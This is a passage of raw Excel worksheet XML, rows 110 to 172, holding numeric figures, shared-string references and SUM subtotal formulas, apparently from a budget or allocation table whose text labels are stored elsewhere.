        <v>302</v>
      </c>
      <c r="D110" s="51">
        <v>11230</v>
      </c>
      <c r="E110" s="1"/>
      <c r="F110" s="1"/>
      <c r="G110" s="1"/>
      <c r="H110" s="1"/>
      <c r="I110" s="1"/>
    </row>
    <row r="111" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A111"/>
      <c r="B111" s="53" t="s">
        <v>306</v>
      </c>
      <c r="C111" s="53"/>
      <c r="D111" s="54">
        <v>2413.3000000000002</v>
      </c>
      <c r="E111" s="53"/>
      <c r="F111" s="1">
        <f t="shared" ref="F111:H111" si="8">SUM(F112:F119)</f>
        <v>26</v>
      </c>
      <c r="G111" s="1">
        <f t="shared" si="8"/>
        <v>80</v>
      </c>
      <c r="H111" s="1">
        <f t="shared" si="8"/>
        <v>279</v>
      </c>
      <c r="I111" s="1"/>
    </row>
    <row r="112" spans="1:9" ht="28.5">
      <c r="A112">
        <v>214</v>
      </c>
      <c r="B112" s="1" t="s">
        <v>559</v>
      </c>
      <c r="C112" s="1" t="s">
        <v>308</v>
      </c>
      <c r="D112" s="51">
        <v>733.7</v>
      </c>
      <c r="E112" s="1"/>
      <c r="F112" s="1"/>
      <c r="G112" s="1"/>
      <c r="H112" s="1">
        <v>73</v>
      </c>
      <c r="I112" s="1"/>
    </row>
    <row r="113" spans="1:9">
      <c r="A113">
        <v>214</v>
      </c>
      <c r="B113" s="1" t="s">
        <v>560</v>
      </c>
      <c r="C113" s="1" t="s">
        <v>561</v>
      </c>
      <c r="D113" s="51">
        <v>780</v>
      </c>
      <c r="E113" s="1"/>
      <c r="F113" s="1"/>
      <c r="G113" s="1"/>
      <c r="H113" s="1"/>
      <c r="I113" s="1"/>
    </row>
    <row r="114" spans="1:9" ht="28.5">
      <c r="A114">
        <v>214</v>
      </c>
      <c r="B114" s="1" t="s">
        <v>562</v>
      </c>
      <c r="C114" s="1" t="s">
        <v>563</v>
      </c>
      <c r="D114" s="51">
        <v>240</v>
      </c>
      <c r="E114" s="1"/>
      <c r="F114" s="1"/>
      <c r="G114" s="1"/>
      <c r="H114" s="1">
        <v>60</v>
      </c>
      <c r="I114" s="1"/>
    </row>
    <row r="115" spans="1:9">
      <c r="A115">
        <v>214</v>
      </c>
      <c r="B115" s="1" t="s">
        <v>564</v>
      </c>
      <c r="C115" s="1" t="s">
        <v>565</v>
      </c>
      <c r="D115" s="51">
        <v>94.6</v>
      </c>
      <c r="E115" s="1"/>
      <c r="F115" s="1"/>
      <c r="G115" s="1"/>
      <c r="H115" s="1">
        <v>50</v>
      </c>
      <c r="I115" s="1"/>
    </row>
    <row r="116" spans="1:9">
      <c r="A116">
        <v>214</v>
      </c>
      <c r="B116" s="1" t="s">
        <v>566</v>
      </c>
      <c r="C116" s="1" t="s">
        <v>567</v>
      </c>
      <c r="D116" s="51">
        <v>26</v>
      </c>
      <c r="E116" s="1"/>
      <c r="F116" s="1">
        <v>26</v>
      </c>
      <c r="G116" s="1"/>
      <c r="H116" s="1"/>
      <c r="I116" s="1"/>
    </row>
    <row r="117" spans="1:9" ht="28.5">
      <c r="A117">
        <v>214</v>
      </c>
      <c r="B117" s="1" t="s">
        <v>568</v>
      </c>
      <c r="C117" s="1" t="s">
        <v>569</v>
      </c>
      <c r="D117" s="51">
        <v>410</v>
      </c>
      <c r="E117" s="1"/>
      <c r="F117" s="1"/>
      <c r="G117" s="1">
        <v>10</v>
      </c>
      <c r="H117" s="1"/>
      <c r="I117" s="1"/>
    </row>
    <row r="118" spans="1:9">
      <c r="A118">
        <v>216</v>
      </c>
      <c r="B118" s="1" t="s">
        <v>570</v>
      </c>
      <c r="C118" s="1" t="s">
        <v>492</v>
      </c>
      <c r="D118" s="51">
        <v>100</v>
      </c>
      <c r="E118" s="1"/>
      <c r="F118" s="1"/>
      <c r="G118" s="1">
        <v>35</v>
      </c>
      <c r="H118" s="1">
        <v>48</v>
      </c>
      <c r="I118" s="1"/>
    </row>
    <row r="119" spans="1:9" ht="28.5">
      <c r="A119">
        <v>216</v>
      </c>
      <c r="B119" s="1" t="s">
        <v>571</v>
      </c>
      <c r="C119" s="1" t="s">
        <v>572</v>
      </c>
      <c r="D119" s="51">
        <v>29</v>
      </c>
      <c r="E119" s="1"/>
      <c r="F119" s="1"/>
      <c r="G119" s="1">
        <v>35</v>
      </c>
      <c r="H119" s="1">
        <v>48</v>
      </c>
      <c r="I119" s="1"/>
    </row>
    <row r="120" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A120"/>
      <c r="B120" s="53" t="s">
        <v>309</v>
      </c>
      <c r="C120" s="53"/>
      <c r="D120" s="54">
        <v>8356.9470000000001</v>
      </c>
      <c r="E120" s="53"/>
      <c r="F120" s="1">
        <f t="shared" ref="F120:H120" si="9">SUM(F121:F140)</f>
        <v>2248</v>
      </c>
      <c r="G120" s="1">
        <f t="shared" si="9"/>
        <v>1471.9</v>
      </c>
      <c r="H120" s="1">
        <f t="shared" si="9"/>
        <v>5398.19</v>
      </c>
      <c r="I120" s="1"/>
    </row>
    <row r="121" spans="1:9" ht="28.5">
      <c r="A121">
        <v>213</v>
      </c>
      <c r="B121" s="1" t="s">
        <v>573</v>
      </c>
      <c r="C121" s="1" t="s">
        <v>311</v>
      </c>
      <c r="D121" s="51">
        <v>99</v>
      </c>
      <c r="E121" s="1"/>
      <c r="F121" s="1"/>
      <c r="G121" s="1">
        <v>61.6</v>
      </c>
      <c r="H121" s="1">
        <v>72</v>
      </c>
      <c r="I121" s="1"/>
    </row>
    <row r="122" spans="1:9" ht="28.5">
      <c r="A122">
        <v>213</v>
      </c>
      <c r="B122" s="1" t="s">
        <v>574</v>
      </c>
      <c r="C122" s="1" t="s">
        <v>313</v>
      </c>
      <c r="D122" s="51">
        <v>358.6</v>
      </c>
      <c r="E122" s="1"/>
      <c r="F122" s="1">
        <v>82</v>
      </c>
      <c r="G122" s="1">
        <v>116.5</v>
      </c>
      <c r="H122" s="1">
        <v>287.54000000000002</v>
      </c>
      <c r="I122" s="1"/>
    </row>
    <row r="123" spans="1:9">
      <c r="A123">
        <v>213</v>
      </c>
      <c r="B123" s="1" t="s">
        <v>575</v>
      </c>
      <c r="C123" s="1" t="s">
        <v>325</v>
      </c>
      <c r="D123" s="51">
        <v>5</v>
      </c>
      <c r="E123" s="1"/>
      <c r="F123" s="1">
        <v>10</v>
      </c>
      <c r="G123" s="1"/>
      <c r="H123" s="1"/>
      <c r="I123" s="1"/>
    </row>
    <row r="124" spans="1:9" ht="28.5">
      <c r="A124">
        <v>213</v>
      </c>
      <c r="B124" s="1" t="s">
        <v>576</v>
      </c>
      <c r="C124" s="1" t="s">
        <v>577</v>
      </c>
      <c r="D124" s="51">
        <v>3966</v>
      </c>
      <c r="E124" s="1"/>
      <c r="F124" s="1">
        <v>60</v>
      </c>
      <c r="G124" s="1">
        <v>282</v>
      </c>
      <c r="H124" s="1">
        <v>2932.55</v>
      </c>
      <c r="I124" s="1"/>
    </row>
    <row r="125" spans="1:9">
      <c r="A125">
        <v>213</v>
      </c>
      <c r="B125" s="1" t="s">
        <v>578</v>
      </c>
      <c r="C125" s="1" t="s">
        <v>579</v>
      </c>
      <c r="D125" s="51">
        <v>15</v>
      </c>
      <c r="E125" s="1"/>
      <c r="F125" s="1"/>
      <c r="G125" s="1"/>
      <c r="H125" s="1">
        <v>48.9</v>
      </c>
      <c r="I125" s="1"/>
    </row>
    <row r="126" spans="1:9">
      <c r="A126">
        <v>213</v>
      </c>
      <c r="B126" s="1" t="s">
        <v>580</v>
      </c>
      <c r="C126" s="1" t="s">
        <v>321</v>
      </c>
      <c r="D126" s="51">
        <v>233</v>
      </c>
      <c r="E126" s="1"/>
      <c r="F126" s="1">
        <v>36</v>
      </c>
      <c r="G126" s="1">
        <v>81</v>
      </c>
      <c r="H126" s="1">
        <v>183</v>
      </c>
      <c r="I126" s="1"/>
    </row>
    <row r="127" spans="1:9" ht="28.5">
      <c r="A127">
        <v>213</v>
      </c>
      <c r="B127" s="1" t="s">
        <v>581</v>
      </c>
      <c r="C127" s="1" t="s">
        <v>315</v>
      </c>
      <c r="D127" s="51">
        <v>185.97200000000001</v>
      </c>
      <c r="E127" s="1"/>
      <c r="F127" s="1">
        <v>68</v>
      </c>
      <c r="G127" s="1">
        <v>172.3</v>
      </c>
      <c r="H127" s="1">
        <v>262.33</v>
      </c>
      <c r="I127" s="1"/>
    </row>
    <row r="128" spans="1:9" ht="42.75">
      <c r="A128">
        <v>213</v>
      </c>
      <c r="B128" s="1" t="s">
        <v>582</v>
      </c>
      <c r="C128" s="1" t="s">
        <v>323</v>
      </c>
      <c r="D128" s="51">
        <v>50</v>
      </c>
      <c r="E128" s="1"/>
      <c r="F128" s="1">
        <v>4</v>
      </c>
      <c r="G128" s="1">
        <v>38</v>
      </c>
      <c r="H128" s="1">
        <v>303</v>
      </c>
      <c r="I128" s="1"/>
    </row>
    <row r="129" spans="1:9">
      <c r="A129">
        <v>213</v>
      </c>
      <c r="B129" s="1" t="s">
        <v>583</v>
      </c>
      <c r="C129" s="1" t="s">
        <v>584</v>
      </c>
      <c r="D129" s="51">
        <v>70</v>
      </c>
      <c r="E129" s="1"/>
      <c r="F129" s="1">
        <v>-30</v>
      </c>
      <c r="G129" s="1">
        <v>100</v>
      </c>
      <c r="H129" s="1">
        <v>282</v>
      </c>
      <c r="I129" s="1"/>
    </row>
    <row r="130" spans="1:9" ht="28.5">
      <c r="A130">
        <v>213</v>
      </c>
      <c r="B130" s="1" t="s">
        <v>585</v>
      </c>
      <c r="C130" s="1" t="s">
        <v>586</v>
      </c>
      <c r="D130" s="51">
        <v>97.28</v>
      </c>
      <c r="E130" s="1"/>
      <c r="F130" s="1">
        <v>10</v>
      </c>
      <c r="G130" s="1">
        <v>10</v>
      </c>
      <c r="H130" s="1">
        <v>108.6</v>
      </c>
      <c r="I130" s="1"/>
    </row>
    <row r="131" spans="1:9">
      <c r="A131">
        <v>213</v>
      </c>
      <c r="B131" s="1" t="s">
        <v>587</v>
      </c>
      <c r="C131" s="1" t="s">
        <v>588</v>
      </c>
      <c r="D131" s="51">
        <v>25</v>
      </c>
      <c r="E131" s="1"/>
      <c r="F131" s="1">
        <v>5</v>
      </c>
      <c r="G131" s="1">
        <v>35.5</v>
      </c>
      <c r="H131" s="1">
        <v>36</v>
      </c>
      <c r="I131" s="1"/>
    </row>
    <row r="132" spans="1:9" ht="28.5">
      <c r="A132">
        <v>213</v>
      </c>
      <c r="B132" s="1" t="s">
        <v>589</v>
      </c>
      <c r="C132" s="1" t="s">
        <v>590</v>
      </c>
      <c r="D132" s="51">
        <v>123.53</v>
      </c>
      <c r="E132" s="1"/>
      <c r="F132" s="1">
        <v>-38</v>
      </c>
      <c r="G132" s="1">
        <v>60</v>
      </c>
      <c r="H132" s="1">
        <v>172.7</v>
      </c>
      <c r="I132" s="1"/>
    </row>
    <row r="133" spans="1:9">
      <c r="A133">
        <v>213</v>
      </c>
      <c r="B133" s="1" t="s">
        <v>591</v>
      </c>
      <c r="C133" s="1" t="s">
        <v>592</v>
      </c>
      <c r="D133" s="51">
        <v>11</v>
      </c>
      <c r="E133" s="1"/>
      <c r="F133" s="1"/>
      <c r="G133" s="1"/>
      <c r="H133" s="1">
        <v>18</v>
      </c>
      <c r="I133" s="1"/>
    </row>
    <row r="134" spans="1:9" ht="28.5">
      <c r="A134">
        <v>213</v>
      </c>
      <c r="B134" s="1" t="s">
        <v>593</v>
      </c>
      <c r="C134" s="1" t="s">
        <v>317</v>
      </c>
      <c r="D134" s="51">
        <v>85</v>
      </c>
      <c r="E134" s="1"/>
      <c r="F134" s="1"/>
      <c r="G134" s="1"/>
      <c r="H134" s="1">
        <v>122.65</v>
      </c>
      <c r="I134" s="1"/>
    </row>
    <row r="135" spans="1:9">
      <c r="A135">
        <v>213</v>
      </c>
      <c r="B135" s="1" t="s">
        <v>594</v>
      </c>
      <c r="C135" s="1" t="s">
        <v>319</v>
      </c>
      <c r="D135" s="51">
        <v>196.22</v>
      </c>
      <c r="E135" s="1"/>
      <c r="F135" s="1">
        <v>95</v>
      </c>
      <c r="G135" s="1"/>
      <c r="H135" s="1">
        <v>33.92</v>
      </c>
      <c r="I135" s="1"/>
    </row>
    <row r="136" spans="1:9">
      <c r="A136">
        <v>201</v>
      </c>
      <c r="B136" s="1" t="s">
        <v>595</v>
      </c>
      <c r="C136" s="1" t="s">
        <v>596</v>
      </c>
      <c r="D136" s="51">
        <v>96</v>
      </c>
      <c r="E136" s="1"/>
      <c r="F136" s="1">
        <v>-4</v>
      </c>
      <c r="G136" s="1">
        <v>15</v>
      </c>
      <c r="H136" s="1">
        <v>35</v>
      </c>
      <c r="I136" s="1"/>
    </row>
    <row r="137" spans="1:9" ht="28.5">
      <c r="A137">
        <v>213</v>
      </c>
      <c r="B137" s="1" t="s">
        <v>597</v>
      </c>
      <c r="C137" s="1" t="s">
        <v>598</v>
      </c>
      <c r="D137" s="51">
        <v>500</v>
      </c>
      <c r="E137" s="1"/>
      <c r="F137" s="1">
        <v>-150</v>
      </c>
      <c r="G137" s="1">
        <v>500</v>
      </c>
      <c r="H137" s="1">
        <v>500</v>
      </c>
      <c r="I137" s="1"/>
    </row>
    <row r="138" spans="1:9">
      <c r="A138">
        <v>206</v>
      </c>
      <c r="B138" s="1" t="s">
        <v>599</v>
      </c>
      <c r="C138" s="1" t="s">
        <v>232</v>
      </c>
      <c r="D138" s="51">
        <v>2100</v>
      </c>
      <c r="E138" s="1"/>
      <c r="F138" s="1">
        <v>2100</v>
      </c>
      <c r="G138" s="1"/>
      <c r="H138" s="1"/>
      <c r="I138" s="1"/>
    </row>
    <row r="139" spans="1:9" ht="28.5">
      <c r="A139">
        <v>213</v>
      </c>
      <c r="B139" s="1" t="s">
        <v>600</v>
      </c>
      <c r="C139" s="1" t="s">
        <v>601</v>
      </c>
      <c r="D139" s="51">
        <v>26.64</v>
      </c>
      <c r="E139" s="1"/>
      <c r="F139" s="1"/>
      <c r="G139" s="1"/>
      <c r="H139" s="1"/>
      <c r="I139" s="1"/>
    </row>
    <row r="140" spans="1:9" ht="28.5">
      <c r="A140">
        <v>213</v>
      </c>
      <c r="B140" s="1" t="s">
        <v>602</v>
      </c>
      <c r="C140" s="1" t="s">
        <v>603</v>
      </c>
      <c r="D140" s="51">
        <v>113.705</v>
      </c>
      <c r="E140" s="1"/>
      <c r="F140" s="1"/>
      <c r="G140" s="1"/>
      <c r="H140" s="1"/>
      <c r="I140" s="1"/>
    </row>
    <row r="141" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A141"/>
      <c r="B141" s="53" t="s">
        <v>327</v>
      </c>
      <c r="C141" s="53"/>
      <c r="D141" s="54">
        <v>2508.5473000000002</v>
      </c>
      <c r="E141" s="53"/>
      <c r="F141" s="1">
        <f t="shared" ref="F141:H141" si="10">SUM(F142:F147)</f>
        <v>1270.54</v>
      </c>
      <c r="G141" s="1">
        <f t="shared" si="10"/>
        <v>40</v>
      </c>
      <c r="H141" s="1">
        <f t="shared" si="10"/>
        <v>5737.5</v>
      </c>
      <c r="I141" s="1"/>
    </row>
    <row r="142" spans="1:9">
      <c r="A142">
        <v>213</v>
      </c>
      <c r="B142" s="1" t="s">
        <v>604</v>
      </c>
      <c r="C142" s="1" t="s">
        <v>311</v>
      </c>
      <c r="D142" s="51">
        <v>265</v>
      </c>
      <c r="E142" s="1"/>
      <c r="F142" s="1"/>
      <c r="G142" s="1"/>
      <c r="H142" s="1"/>
      <c r="I142" s="1"/>
    </row>
    <row r="143" spans="1:9" ht="42.75">
      <c r="A143">
        <v>213</v>
      </c>
      <c r="B143" s="1" t="s">
        <v>605</v>
      </c>
      <c r="C143" s="1" t="s">
        <v>329</v>
      </c>
      <c r="D143" s="51">
        <v>1482.65</v>
      </c>
      <c r="E143" s="56" t="s">
        <v>801</v>
      </c>
      <c r="F143" s="1">
        <v>30</v>
      </c>
      <c r="G143" s="1"/>
      <c r="H143" s="1">
        <v>5</v>
      </c>
      <c r="I143" s="1"/>
    </row>
    <row r="144" spans="1:9" ht="71.25">
      <c r="A144">
        <v>221</v>
      </c>
      <c r="B144" s="1" t="s">
        <v>606</v>
      </c>
      <c r="C144" s="1" t="s">
        <v>294</v>
      </c>
      <c r="D144" s="51">
        <v>0</v>
      </c>
      <c r="E144" s="1"/>
      <c r="F144" s="1">
        <v>-70.459999999999994</v>
      </c>
      <c r="G144" s="1">
        <v>40</v>
      </c>
      <c r="H144" s="1">
        <v>5732.5</v>
      </c>
      <c r="I144" s="1" t="s">
        <v>537</v>
      </c>
    </row>
    <row r="145" spans="1:9" ht="28.5">
      <c r="A145">
        <v>221</v>
      </c>
      <c r="B145" s="1" t="s">
        <v>607</v>
      </c>
      <c r="C145" s="1" t="s">
        <v>535</v>
      </c>
      <c r="D145" s="51">
        <v>148.9973</v>
      </c>
      <c r="E145" s="1"/>
      <c r="F145" s="1"/>
      <c r="G145" s="1"/>
      <c r="H145" s="1"/>
      <c r="I145" s="1"/>
    </row>
    <row r="146" spans="1:9">
      <c r="A146">
        <v>213</v>
      </c>
      <c r="B146" s="1" t="s">
        <v>608</v>
      </c>
      <c r="C146" s="1" t="s">
        <v>230</v>
      </c>
      <c r="D146" s="51">
        <v>325.89999999999998</v>
      </c>
      <c r="E146" s="1"/>
      <c r="F146" s="1">
        <v>1265</v>
      </c>
      <c r="G146" s="1"/>
      <c r="H146" s="1"/>
      <c r="I146" s="1"/>
    </row>
    <row r="147" spans="1:9" ht="28.5">
      <c r="A147">
        <v>213</v>
      </c>
      <c r="B147" s="1" t="s">
        <v>609</v>
      </c>
      <c r="C147" s="1" t="s">
        <v>232</v>
      </c>
      <c r="D147" s="51">
        <v>286</v>
      </c>
      <c r="E147" s="1"/>
      <c r="F147" s="1">
        <v>46</v>
      </c>
      <c r="G147" s="1"/>
      <c r="H147" s="1"/>
      <c r="I147" s="1"/>
    </row>
    <row r="148" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A148"/>
      <c r="B148" s="53" t="s">
        <v>333</v>
      </c>
      <c r="C148" s="53"/>
      <c r="D148" s="54">
        <v>14485.103800000001</v>
      </c>
      <c r="E148" s="53"/>
      <c r="F148" s="1">
        <f t="shared" ref="F148:H148" si="11">SUM(F149:F166)</f>
        <v>338</v>
      </c>
      <c r="G148" s="1">
        <f t="shared" si="11"/>
        <v>1093</v>
      </c>
      <c r="H148" s="1">
        <f t="shared" si="11"/>
        <v>5085.82</v>
      </c>
      <c r="I148" s="1"/>
    </row>
    <row r="149" spans="1:9" ht="42.75">
      <c r="A149">
        <v>201</v>
      </c>
      <c r="B149" s="1" t="s">
        <v>610</v>
      </c>
      <c r="C149" s="1" t="s">
        <v>611</v>
      </c>
      <c r="D149" s="51">
        <v>10170.06</v>
      </c>
      <c r="E149" s="1"/>
      <c r="F149" s="1">
        <v>90</v>
      </c>
      <c r="G149" s="1">
        <f>135+89+35</f>
        <v>259</v>
      </c>
      <c r="H149" s="1">
        <v>3606.98</v>
      </c>
      <c r="I149" s="1"/>
    </row>
    <row r="150" spans="1:9">
      <c r="A150">
        <v>201</v>
      </c>
      <c r="B150" s="1" t="s">
        <v>612</v>
      </c>
      <c r="C150" s="1" t="s">
        <v>613</v>
      </c>
      <c r="D150" s="51">
        <v>179</v>
      </c>
      <c r="E150" s="1"/>
      <c r="F150" s="1">
        <v>49</v>
      </c>
      <c r="G150" s="1">
        <v>93</v>
      </c>
      <c r="H150" s="1">
        <v>450</v>
      </c>
      <c r="I150" s="1"/>
    </row>
    <row r="151" spans="1:9" ht="28.5">
      <c r="A151">
        <v>201</v>
      </c>
      <c r="B151" s="1" t="s">
        <v>614</v>
      </c>
      <c r="C151" s="1" t="s">
        <v>228</v>
      </c>
      <c r="D151" s="51">
        <v>2152.75</v>
      </c>
      <c r="E151" s="1"/>
      <c r="F151" s="1"/>
      <c r="G151" s="1"/>
      <c r="H151" s="1"/>
      <c r="I151" s="1"/>
    </row>
    <row r="152" spans="1:9">
      <c r="A152">
        <v>216</v>
      </c>
      <c r="B152" s="1" t="s">
        <v>615</v>
      </c>
      <c r="C152" s="1" t="s">
        <v>616</v>
      </c>
      <c r="D152" s="51">
        <v>43.2</v>
      </c>
      <c r="E152" s="1"/>
      <c r="F152" s="1">
        <v>10</v>
      </c>
      <c r="G152" s="1">
        <v>45</v>
      </c>
      <c r="H152" s="1">
        <v>14.5</v>
      </c>
      <c r="I152" s="1"/>
    </row>
    <row r="153" spans="1:9" ht="28.5">
      <c r="A153">
        <v>201</v>
      </c>
      <c r="B153" s="1" t="s">
        <v>617</v>
      </c>
      <c r="C153" s="1" t="s">
        <v>335</v>
      </c>
      <c r="D153" s="51">
        <v>74.8</v>
      </c>
      <c r="E153" s="1"/>
      <c r="F153" s="1"/>
      <c r="G153" s="1">
        <v>52</v>
      </c>
      <c r="H153" s="1">
        <v>85</v>
      </c>
      <c r="I153" s="1"/>
    </row>
    <row r="154" spans="1:9" ht="28.5">
      <c r="A154">
        <v>206</v>
      </c>
      <c r="B154" s="1" t="s">
        <v>618</v>
      </c>
      <c r="C154" s="1" t="s">
        <v>347</v>
      </c>
      <c r="D154" s="51">
        <v>28.9</v>
      </c>
      <c r="E154" s="1"/>
      <c r="F154" s="1">
        <v>10</v>
      </c>
      <c r="G154" s="1">
        <v>34</v>
      </c>
      <c r="H154" s="1">
        <v>84.8</v>
      </c>
      <c r="I154" s="1"/>
    </row>
    <row r="155" spans="1:9">
      <c r="A155">
        <v>215</v>
      </c>
      <c r="B155" s="1" t="s">
        <v>619</v>
      </c>
      <c r="C155" s="1" t="s">
        <v>620</v>
      </c>
      <c r="D155" s="51">
        <v>79</v>
      </c>
      <c r="E155" s="1"/>
      <c r="F155" s="1">
        <v>69</v>
      </c>
      <c r="G155" s="1">
        <v>113</v>
      </c>
      <c r="H155" s="1"/>
      <c r="I155" s="1"/>
    </row>
    <row r="156" spans="1:9" ht="28.5">
      <c r="A156">
        <v>215</v>
      </c>
      <c r="B156" s="1" t="s">
        <v>621</v>
      </c>
      <c r="C156" s="1" t="s">
        <v>622</v>
      </c>
      <c r="D156" s="51">
        <v>132.72</v>
      </c>
      <c r="E156" s="1"/>
      <c r="F156" s="1"/>
      <c r="G156" s="1">
        <v>27</v>
      </c>
      <c r="H156" s="1">
        <v>51.6</v>
      </c>
      <c r="I156" s="1"/>
    </row>
    <row r="157" spans="1:9">
      <c r="A157">
        <v>216</v>
      </c>
      <c r="B157" s="1" t="s">
        <v>623</v>
      </c>
      <c r="C157" s="1" t="s">
        <v>624</v>
      </c>
      <c r="D157" s="51">
        <v>43.67</v>
      </c>
      <c r="E157" s="1"/>
      <c r="F157" s="1">
        <v>5</v>
      </c>
      <c r="G157" s="1">
        <v>22</v>
      </c>
      <c r="H157" s="1">
        <v>14.04</v>
      </c>
      <c r="I157" s="1"/>
    </row>
    <row r="158" spans="1:9" ht="28.5">
      <c r="A158">
        <v>215</v>
      </c>
      <c r="B158" s="1" t="s">
        <v>625</v>
      </c>
      <c r="C158" s="1" t="s">
        <v>337</v>
      </c>
      <c r="D158" s="51">
        <v>113.48</v>
      </c>
      <c r="E158" s="1"/>
      <c r="F158" s="1"/>
      <c r="G158" s="1">
        <v>119</v>
      </c>
      <c r="H158" s="1">
        <v>102.7</v>
      </c>
      <c r="I158" s="1"/>
    </row>
    <row r="159" spans="1:9" ht="28.5">
      <c r="A159">
        <v>215</v>
      </c>
      <c r="B159" s="1" t="s">
        <v>626</v>
      </c>
      <c r="C159" s="1" t="s">
        <v>339</v>
      </c>
      <c r="D159" s="51">
        <v>169.5</v>
      </c>
      <c r="E159" s="1"/>
      <c r="F159" s="1"/>
      <c r="G159" s="1">
        <v>33</v>
      </c>
      <c r="H159" s="1">
        <v>110</v>
      </c>
      <c r="I159" s="1"/>
    </row>
    <row r="160" spans="1:9">
      <c r="A160">
        <v>215</v>
      </c>
      <c r="B160" s="1" t="s">
        <v>627</v>
      </c>
      <c r="C160" s="1" t="s">
        <v>628</v>
      </c>
      <c r="D160" s="51">
        <v>68.523799999999994</v>
      </c>
      <c r="E160" s="1"/>
      <c r="F160" s="1">
        <v>25</v>
      </c>
      <c r="G160" s="1">
        <v>50</v>
      </c>
      <c r="H160" s="1">
        <v>20</v>
      </c>
      <c r="I160" s="1"/>
    </row>
    <row r="161" spans="1:9" ht="28.5">
      <c r="A161">
        <v>215</v>
      </c>
      <c r="B161" s="1" t="s">
        <v>629</v>
      </c>
      <c r="C161" s="1" t="s">
        <v>630</v>
      </c>
      <c r="D161" s="51">
        <v>338.7</v>
      </c>
      <c r="E161" s="1"/>
      <c r="F161" s="1"/>
      <c r="G161" s="1"/>
      <c r="H161" s="1"/>
      <c r="I161" s="1"/>
    </row>
    <row r="162" spans="1:9" ht="42.75">
      <c r="A162">
        <v>216</v>
      </c>
      <c r="B162" s="1" t="s">
        <v>631</v>
      </c>
      <c r="C162" s="1" t="s">
        <v>341</v>
      </c>
      <c r="D162" s="51">
        <v>369</v>
      </c>
      <c r="E162" s="1"/>
      <c r="F162" s="1"/>
      <c r="G162" s="1">
        <v>66</v>
      </c>
      <c r="H162" s="1">
        <v>70</v>
      </c>
      <c r="I162" s="1"/>
    </row>
    <row r="163" spans="1:9">
      <c r="A163">
        <v>216</v>
      </c>
      <c r="B163" s="1" t="s">
        <v>632</v>
      </c>
      <c r="C163" s="1" t="s">
        <v>343</v>
      </c>
      <c r="D163" s="51">
        <v>94.8</v>
      </c>
      <c r="E163" s="1"/>
      <c r="F163" s="1">
        <v>70</v>
      </c>
      <c r="G163" s="1">
        <v>100</v>
      </c>
      <c r="H163" s="1">
        <v>56.2</v>
      </c>
      <c r="I163" s="1"/>
    </row>
    <row r="164" spans="1:9">
      <c r="A164">
        <v>222</v>
      </c>
      <c r="B164" s="1" t="s">
        <v>633</v>
      </c>
      <c r="C164" s="1" t="s">
        <v>634</v>
      </c>
      <c r="D164" s="51">
        <v>10</v>
      </c>
      <c r="E164" s="1"/>
      <c r="F164" s="1">
        <v>10</v>
      </c>
      <c r="G164" s="1">
        <v>80</v>
      </c>
      <c r="H164" s="1">
        <v>9</v>
      </c>
      <c r="I164" s="1"/>
    </row>
    <row r="165" spans="1:9" ht="28.5">
      <c r="A165">
        <v>213</v>
      </c>
      <c r="B165" s="1" t="s">
        <v>635</v>
      </c>
      <c r="C165" s="1" t="s">
        <v>397</v>
      </c>
      <c r="D165" s="51">
        <v>10</v>
      </c>
      <c r="E165" s="1"/>
      <c r="F165" s="1"/>
      <c r="G165" s="1"/>
      <c r="H165" s="1"/>
      <c r="I165" s="1"/>
    </row>
    <row r="166" spans="1:9" ht="213.75">
      <c r="A166">
        <v>215</v>
      </c>
      <c r="B166" s="1" t="s">
        <v>636</v>
      </c>
      <c r="C166" s="1" t="s">
        <v>637</v>
      </c>
      <c r="D166" s="51">
        <v>407</v>
      </c>
      <c r="E166" s="1"/>
      <c r="F166" s="1"/>
      <c r="G166" s="1"/>
      <c r="H166" s="1">
        <v>411</v>
      </c>
      <c r="I166" s="1"/>
    </row>
    <row r="167" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A167"/>
      <c r="B167" s="53" t="s">
        <v>348</v>
      </c>
      <c r="C167" s="53"/>
      <c r="D167" s="54">
        <v>328</v>
      </c>
      <c r="E167" s="53"/>
      <c r="F167" s="1">
        <f t="shared" ref="F167:H167" si="12">SUM(F168:F169)</f>
        <v>0</v>
      </c>
      <c r="G167" s="1">
        <f t="shared" si="12"/>
        <v>340</v>
      </c>
      <c r="H167" s="1">
        <f t="shared" si="12"/>
        <v>340</v>
      </c>
      <c r="I167" s="1"/>
    </row>
    <row r="168" spans="1:9">
      <c r="A168">
        <v>221</v>
      </c>
      <c r="B168" s="1" t="s">
        <v>638</v>
      </c>
      <c r="C168" s="1" t="s">
        <v>294</v>
      </c>
      <c r="D168" s="51">
        <v>28</v>
      </c>
      <c r="E168" s="1"/>
      <c r="F168" s="1"/>
      <c r="G168" s="1">
        <v>40</v>
      </c>
      <c r="H168" s="1">
        <v>40</v>
      </c>
      <c r="I168" s="1"/>
    </row>
    <row r="169" spans="1:9" ht="28.5">
      <c r="A169">
        <v>221</v>
      </c>
      <c r="B169" s="1" t="s">
        <v>639</v>
      </c>
      <c r="C169" s="1" t="s">
        <v>640</v>
      </c>
      <c r="D169" s="51">
        <v>300</v>
      </c>
      <c r="E169" s="1"/>
      <c r="F169" s="1"/>
      <c r="G169" s="1">
        <v>300</v>
      </c>
      <c r="H169" s="1">
        <v>300</v>
      </c>
      <c r="I169" s="1"/>
    </row>
    <row r="170" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A170"/>
      <c r="B170" s="53" t="s">
        <v>641</v>
      </c>
      <c r="C170" s="53"/>
      <c r="D170" s="54">
        <v>7340.6417240000001</v>
      </c>
      <c r="E170" s="53"/>
      <c r="F170" s="1">
        <f t="shared" ref="F170:H170" si="13">SUM(F171:F173)</f>
        <v>0</v>
      </c>
      <c r="G170" s="1">
        <f t="shared" si="13"/>
        <v>5593.3662770000001</v>
      </c>
      <c r="H170" s="1">
        <f t="shared" si="13"/>
        <v>8635.3662769999992</v>
      </c>
      <c r="I170" s="1"/>
    </row>
    <row r="171" spans="1:9">
      <c r="A171">
        <v>231</v>
      </c>
      <c r="B171" s="1" t="s">
        <v>642</v>
      </c>
      <c r="C171" s="1" t="s">
        <v>294</v>
      </c>
      <c r="D171" s="51">
        <v>33.366276999999997</v>
      </c>
      <c r="E171" s="1"/>
      <c r="F171" s="1"/>
      <c r="G171" s="1">
        <v>33.366276999999997</v>
      </c>
      <c r="H171" s="1">
        <v>33.366276999999997</v>
      </c>
      <c r="I171" s="1"/>
    </row>
    <row r="172" spans="1:9" ht="28.5">
